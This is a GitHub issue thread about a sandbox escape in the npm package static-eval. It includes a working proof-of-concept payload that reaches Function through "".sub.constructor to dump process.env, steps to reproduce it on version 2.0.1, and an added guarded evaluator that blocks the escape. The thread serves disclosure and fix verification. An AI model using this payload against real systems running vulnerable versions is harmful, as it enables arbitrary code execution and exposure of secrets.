security issue #20
Comments
#21 fixes the security issue |
@substack Can you please take a look? |
Despite the release 4 hours ago, this remains applicable. Is that a mistake? I'm going to assume NPM has some kind of review process? Thank you for the quick response! |
Turns out it doesn't due to scoping issues. #23 is the intended fix. |
Similar behavior here! |
We are experiencing the same thing. My application has to pass npm audit for regulatory compliance. Please advise. |
I've run the proof of concept with 2.0.1 and the output is the whole set of environment variables. Upgrading to 2.0.2 outputs

First, create the index file in a new directory. index.js:

```js
var evaluate = require('static-eval');
var parse = require('esprima').parse;
var src = process.argv[2];
// Proof of concept: reaches Function through "".sub.constructor and calls it
var payload = '(function({x}){return x.constructor})({x:"".sub})("console.log(process.env)")()';
var ast = parse(payload).body[0].expression;
console.log(evaluate(ast, {x:1}));
```

Then create the package file with deps (using

```sh
cd NEW-DIR # where you created index.js
npm init -y
npm install static-eval@2.0.1 esprima
node .
```

Should output environment variables, which we wanted to prevent by using static-eval.

```sh
npm install static-eval@2.0.2
node .
```

Should only output

Who can update the advisory? |
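As an added example (not code from static-eval, from this thread, or from the fix in #23), here is a small evaluator over a subset of esprima's ESTree output that shows the guards a safe evaluator needs against the escape reproduced above: it refuses property reads on function values, never returns a function from member access (so `"".sub` and then `.constructor` are both refused), and only invokes functions explicitly supplied in `vars`. The names `evaluateSafe` and `FAIL` and the inline ASTs are constructed for this example.

```javascript
// Added example, not static-eval's code. Evaluates a subset of esprima's ESTree
// output with the guards that block the "".sub.constructor escape shown above.
const FAIL = Symbol('fail'); // sentinel: expression refused, nothing executed
function evaluateSafe(node, vars) {
  switch (node.type) {
    case 'Literal':
      return node.value;
    case 'Identifier':
      return Object.prototype.hasOwnProperty.call(vars, node.name) ? vars[node.name] : FAIL;
    case 'MemberExpression': {
      const obj = evaluateSafe(node.object, vars);
      if (obj === FAIL || obj == null) return FAIL;
      // Guard 1: a function value exposes .constructor === Function; never read from it.
      if (typeof obj === 'function') return FAIL;
      const key = node.computed ? evaluateSafe(node.property, vars) : node.property.name;
      if (key === FAIL || key === 'constructor' || key === '__proto__' || key === 'prototype') return FAIL;
      const val = obj[key];
      // Guard 2: member access never yields a function ("".sub is a method, so it is refused).
      return typeof val === 'function' ? FAIL : val;
    }
    case 'CallExpression': {
      const callee = evaluateSafe(node.callee, vars);
      // Guard 3: only functions explicitly supplied by the caller in `vars` may be invoked.
      if (typeof callee !== 'function' || !Object.values(vars).includes(callee)) return FAIL;
      const args = node.arguments.map((a) => evaluateSafe(a, vars));
      return args.includes(FAIL) ? FAIL : callee(...args);
    }
    default:
      return FAIL; // anything unhandled (ObjectExpression, FunctionExpression, ...) is refused
  }
}
// Constructed ESTree (the shape esprima produces) for the escape's core: "".sub.constructor
const escapeAst = {
  type: 'MemberExpression', computed: false,
  object: { type: 'MemberExpression', computed: false,
            object: { type: 'Literal', value: '' },
            property: { type: 'Identifier', name: 'sub' } },
  property: { type: 'Identifier', name: 'constructor' },
};
// Constructed benign expression: len("abc"), with `len` supplied by the host
const benignAst = {
  type: 'CallExpression',
  callee: { type: 'Identifier', name: 'len' },
  arguments: [{ type: 'Literal', value: 'abc' }],
};
console.log(evaluateSafe(escapeAst, {}) === FAIL);              // true: escape refused
console.log(evaluateSafe(benignAst, { len: (s) => s.length })); // 3
```

Computed lookups such as `""["constructor"]` hit the same key check, and any node kind the evaluator does not model is refused rather than guessed at.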
Updated |
Ping; closing time :-) |
https://npmjs.com/advisories/758